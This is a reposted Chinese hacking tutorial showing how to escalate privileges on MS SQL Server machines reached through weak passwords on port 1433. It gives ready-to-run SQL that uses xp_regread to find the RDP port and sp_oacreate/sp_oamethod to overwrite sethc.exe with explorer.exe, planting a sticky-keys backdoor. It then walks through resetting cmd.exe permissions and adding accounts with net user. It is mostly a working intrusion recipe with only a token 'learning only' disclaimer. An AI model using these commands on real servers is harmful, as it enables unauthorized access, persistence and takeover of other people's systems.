利用shift功能巧妙提权

  • 时间:
  • 来源:互联网
  • 文章标签:

这是第三次发有关1433弱口令的教程了,前面两次教程也针对1433的修复和提权进行了详细的讲解,今天依然给大家带来一个1433弱口令的提权方法。说是巧妙,其实很多大牛早就在使用了,本教程旨在对初学1433弱口令提权的菜鸟们,高手请无视。
  连接弱口令主机


随便运行个dos命令,看到错误提示:Error Message:xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)上一期教程的服务器也是这个错误,我们绕过错误去拿webshell,是寻找服务器上的网站,利用分离器传小马,再传大马。
  这期我们就讲下这个错误产生的原因,以及巧妙的修复其实也可以说是绕过他来提权。
  错误5是个系统提示的错误号,CreateProcess这个是创建线程的意思,这个错误产生和系统文件cmd.exe有很大的关系,一种情况是cmd被删除,一种是cmd的权限被降低了。(如果我这种说法有什么错误,请高手指出一下,本人理解的是这样)。
  去windowssystem32目录和sql的安装目录去看看,是否需要的文件都在
cmd.exe存在odsole70.dll存在,为什么要看这个文件是否存在?因为我们等下要用到的存储过程需要到这个文件。
  下面先查看下终端端口及开放情况
  sql指令输入
  exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp','PortNumber'
返回成功,终端端口为78
  打开3389连接命令mstsc连接IP:78 出现登录界面,证明78端口是对外开放的。
  好了,下面关键的地方了,要用到两条sql指令,将系统的explorer文件复制为系统的shift后门文件,下面两条语句为分别执行的,不可以放在一起执行,我是在sql tools 2.0工具里执行的,你也可以在分离器中执行,记得分别执行。
  //这条语句将explorer.exe复制为sethc.exe
  declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:windowsexplorer.exe','c:windowssystem32sethc.exe';
  //这条语句将sethc.exe复制到dllcache目录下
  declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:windowssystem32sethc.exe','c:windowssystem32dllcachesethc.exe';
  这个两条语句执行的时间间隔最好不超过10秒钟,否则系统会自动恢复原来的文件。
  另外这两条语句使用到的sp_oacreate存储过程需要使用到odsole70.dll这个文件,所以这个文件的存亡,关系到创建的成功与否。
玩过shift后门的人一眼就看出了,这个是最古老的shift后门创建的方法,教程看到这里估计有一半人要关掉网页了,那么剩下那一半的菜鸟咱们继续交流。走的那些都是高手^_^
  这个部分就不截图了,看返回信息就好
  复制好了,我们去连接3389运行shift后门试试 五次shift后,界面弹出了资源管理器。
  到windowssystem32目录下找到cmd.exe,双击运行试试
说没有合适的权限运行它。在cmd.exe上右键属性,看下安全选项卡看到system的权限全部都被拒绝了,选择允许完全控制后,点应用,更改cmd的运行权限,ok这样再双击cmd,他就可以被运行了,下面就net user等指令添加用户提权吧。
  这时我提示你一下,此时你再去sql tools里运行下dos命令,发现可以正常运行了,说明这个错误Error Message:xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)产生的原因,就是因为cmd的权限问题了,以后遇到这样的问题,你就知道该怎么处理了。
  好了,用刚添加的用户登录下服务器,注意终端端口。
 上期教程有人问我,如果服务器上没网站怎么办,其实提权的方式方法多种多样,有时不能用单一的方法就能提权成功,可以考虑多种方法的结合运用。好了,连续三期的1433弱口令的提权方法我就介绍这么多了,等我学习到更多的方法后再和大家分享了。谢谢大家耐心看完本教程。本教程仅做学习交流之用,请不要用于非法用途。

转载于:https://www.cnblogs.com/baogg/articles/1984361.html

本文链接http://www.taodudu.cc/news/show-647822.html